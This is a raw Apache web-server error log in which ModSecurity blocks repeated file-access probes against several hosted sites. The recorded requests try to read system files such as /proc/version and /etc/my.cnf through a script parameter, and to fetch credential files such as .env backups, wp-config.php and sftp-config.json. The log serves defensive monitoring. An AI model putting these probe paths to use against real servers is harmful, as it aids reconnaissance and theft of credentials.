[Mon May 11 11:57:34.466579 2026] [ssl:error] [pid 1254212:tid 1254216] (EAI 2)Name or service not known: [client 88.174.213.70:39843] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:57:34.466616 2026] [ssl:error] [pid 1254212:tid 1254216] AH01941: stapling_renew_response: responder error
[Mon May 11 11:57:34.574710 2026] [ssl:error] [pid 1254242:tid 1254253] (EAI 2)Name or service not known: [client 88.174.213.70:48604] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:57:34.574750 2026] [ssl:error] [pid 1254242:tid 1254253] AH01941: stapling_renew_response: responder error
[Mon May 11 11:57:34.626096 2026] [ssl:error] [pid 1256241:tid 1256266] (EAI 2)Name or service not known: [client 88.174.213.70:47918] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:57:34.626135 2026] [ssl:error] [pid 1256241:tid 1256266] AH01941: stapling_renew_response: responder error
[Mon May 11 11:57:34.674394 2026] [ssl:error] [pid 1254212:tid 1254232] (EAI 2)Name or service not known: [client 88.174.213.70:33128] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:57:34.674422 2026] [ssl:error] [pid 1254212:tid 1254232] AH01941: stapling_renew_response: responder error
[Mon May 11 11:57:40.808414 2026] [security2:error] [pid 1254328:tid 1254353] [client 216.73.216.110:62453] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:path: /etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoFERdw2n9wv6Ai48JzwAAAJg"]
[Mon May 11 11:57:40.809231 2026] [security2:error] [pid 1254328:tid 1254353] [client 216.73.216.110:62453] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoFERdw2n9wv6Ai48JzwAAAJg"]
[Mon May 11 11:57:40.899985 2026] [security2:error] [pid 1254328:tid 1254353] [client 216.73.216.110:62453] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoFERdw2n9wv6Ai48JzwAAAJg"]
[Mon May 11 11:57:48.936343 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:28244] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /app/sftp-config.json-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/sftp-config.json-update"] [unique_id "agGoHERdw2n9wv6Ai48J3wAAAIs"]
[Mon May 11 11:57:48.936806 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:28244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/sftp-config.json-update"] [unique_id "agGoHERdw2n9wv6Ai48J3wAAAIs"]
[Mon May 11 11:57:50.099305 2026] [security2:error] [pid 1254328:tid 1254342] [client 185.177.72.9:28244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoHERdw2n9wv6Ai48J3wAAAIs"]
[Mon May 11 11:57:50.125871 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:28250] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /app/sftp-config.json-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/app/sftp-config.json-update"] [unique_id "agGoHpkIEwRJMyDaV55QAgAAAUQ"]
[Mon May 11 11:57:50.129371 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:28250] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/app/sftp-config.json-update"] [unique_id "agGoHpkIEwRJMyDaV55QAgAAAUQ"]
[Mon May 11 11:57:51.329599 2026] [security2:error] [pid 1256241:tid 1256250] [client 185.177.72.9:28250] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoHpkIEwRJMyDaV55QAgAAAUQ"]
[Mon May 11 11:57:52.625465 2026] [security2:error] [pid 1256241:tid 1256267] [client 216.73.216.110:37386] ModSecurity: Warning. Matched phrase "proc/cpuinfo" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/cpuinfo found within ARGS:filesrc: /proc/cpuinfo"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoIJkIEwRJMyDaV55QDQAAAVU"]
[Mon May 11 11:57:52.626375 2026] [security2:error] [pid 1256241:tid 1256267] [client 216.73.216.110:37386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoIJkIEwRJMyDaV55QDQAAAVU"]
[Mon May 11 11:57:52.685089 2026] [security2:error] [pid 1256241:tid 1256267] [client 216.73.216.110:37386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoIJkIEwRJMyDaV55QDQAAAVU"]
[Mon May 11 11:58:06.282719 2026] [security2:error] [pid 1254242:tid 1254269] [client 216.73.216.110:43125] ModSecurity: Warning. Matched phrase "proc/version" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: proc/version found within ARGS:filesrc: /proc/version"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoLr4KNmD_mZ_vlf86ZwAAAFg"]
[Mon May 11 11:58:06.283868 2026] [security2:error] [pid 1254242:tid 1254269] [client 216.73.216.110:43125] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoLr4KNmD_mZ_vlf86ZwAAAFg"]
[Mon May 11 11:58:06.375275 2026] [security2:error] [pid 1254242:tid 1254269] [client 216.73.216.110:43125] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoLr4KNmD_mZ_vlf86ZwAAAFg"]
[Mon May 11 11:58:13.409600 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:8492] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /aws/wp-config.php._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/aws/wp-config.php._"] [unique_id "agGoNZkIEwRJMyDaV55QGAAAAUM"]
[Mon May 11 11:58:13.409837 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:8492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/aws/wp-config.php._"] [unique_id "agGoNZkIEwRJMyDaV55QGAAAAUM"]
[Mon May 11 11:58:15.603846 2026] [security2:error] [pid 1256241:tid 1256249] [client 185.177.72.9:8492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoNZkIEwRJMyDaV55QGAAAAUM"]
[Mon May 11 11:58:15.630666 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:8506] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /aws/wp-config.php._"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/aws/wp-config.php._"] [unique_id "agGoN0YQeUtAPynIs6xaBwAAAAU"]
[Mon May 11 11:58:15.631087 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:8506] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/aws/wp-config.php._"] [unique_id "agGoN0YQeUtAPynIs6xaBwAAAAU"]
[Mon May 11 11:58:16.853663 2026] [security2:error] [pid 1254212:tid 1254219] [client 185.177.72.9:8506] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoN0YQeUtAPynIs6xaBwAAAAU"]
[Mon May 11 11:58:25.295449 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:55682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env.bak.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/azure/.env.bak.sample"] [unique_id "agGoQZkIEwRJMyDaV55QJwAAAUc"]
[Mon May 11 11:58:25.295772 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:55682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/azure/.env.bak.sample"] [unique_id "agGoQZkIEwRJMyDaV55QJwAAAUc"]
[Mon May 11 11:58:26.484382 2026] [security2:error] [pid 1256241:tid 1256253] [client 185.177.72.9:55682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoQZkIEwRJMyDaV55QJwAAAUc"]
[Mon May 11 11:58:26.512430 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:55692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env.bak.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/azure/.env.bak.sample"] [unique_id "agGoQmS6k_SCYd1AVZqv_wAAAQI"]
[Mon May 11 11:58:26.512729 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:55692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/azure/.env.bak.sample"] [unique_id "agGoQmS6k_SCYd1AVZqv_wAAAQI"]
[Mon May 11 11:58:27.748906 2026] [security2:error] [pid 1254179:tid 1254183] [client 185.177.72.9:55692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoQmS6k_SCYd1AVZqv_wAAAQI"]
[Mon May 11 11:58:27.776526 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:55702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env.dev.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/azure/.env.dev.archived"] [unique_id "agGoQ5kIEwRJMyDaV55QKAAAAUs"]
[Mon May 11 11:58:27.776824 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:55702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/azure/.env.dev.archived"] [unique_id "agGoQ5kIEwRJMyDaV55QKAAAAUs"]
[Mon May 11 11:58:28.979663 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:55702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoQ5kIEwRJMyDaV55QKAAAAUs"]
[Mon May 11 11:58:29.006927 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:55712] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env.dev.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/azure/.env.dev.archived"] [unique_id "agGoRZkIEwRJMyDaV55QKQAAAVA"]
[Mon May 11 11:58:29.007253 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:55712] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/azure/.env.dev.archived"] [unique_id "agGoRZkIEwRJMyDaV55QKQAAAVA"]
[Mon May 11 11:58:30.039624 2026] [:error] [pid 1254212:tid 1254220] [client 20.163.30.209:49540] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 11:58:30.161578 2026] [security2:error] [pid 1254212:tid 1254225] [client 216.73.216.110:44869] ModSecurity: Warning. Matched phrase "etc/motd" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/motd found within ARGS:path: /etc/motd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoRkYQeUtAPynIs6xaSwAAAAs"]
[Mon May 11 11:58:30.162348 2026] [security2:error] [pid 1254212:tid 1254225] [client 216.73.216.110:44869] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGoRkYQeUtAPynIs6xaSwAAAAs"]
[Mon May 11 11:58:30.220270 2026] [security2:error] [pid 1254212:tid 1254225] [client 216.73.216.110:44869] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoRkYQeUtAPynIs6xaSwAAAAs"]
[Mon May 11 11:58:30.234487 2026] [security2:error] [pid 1256241:tid 1256262] [client 185.177.72.9:55712] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGoRZkIEwRJMyDaV55QKQAAAVA"]
[Mon May 11 11:58:33.440306 2026] [:error] [pid 1254242:tid 1254249] [client 77.75.76.170:3110] File does not exist: /home/ofcrysta/public_html/index2.php
